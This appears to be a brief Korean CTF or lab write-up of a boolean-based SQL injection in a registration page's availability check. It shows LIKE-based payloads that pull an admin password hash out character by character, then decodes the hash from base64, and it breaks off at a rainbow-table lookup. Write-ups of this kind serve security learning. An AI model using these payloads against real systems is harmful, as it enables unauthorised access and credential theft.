image.png

registration 부분에 check abailability 부분으로 sql 인젝션이 가능하다. (bolean base sql injection)

like 문을 이용하여 하나씩 하면 예측 가능

admin' and password_hash LIKE 'o%' #

image.png

admin' and password_hash LIKE 'oa%' #

image.png

admin' and password_hash LIKE 'or%' #

image.png

파이썬등을 이용하면 자동화 가능

얻어진 hash값은 다음과 같음

orOGuaoRz8DCr4zK+cEHcW6l3HPV1HTjJu4Qc+AQZoP3kj04ayVpHEBR7Naz41UZ1e+R9lVvd1JQPLaY+s8JlA==

==패딩, 글자수가 4의 배수임 → base64 인코딩 방식

base64 디코딩 해보면

a2b386b9aa11cfc0c2af8ccaf9c107716ea5dc73d5d474e326ee1073e0106683f7923d386b25691c4051ecd6b3e35519d5ef91f6556f7752503cb698facf0994

을 얻는다.

레인보우 테이블에 넣어보면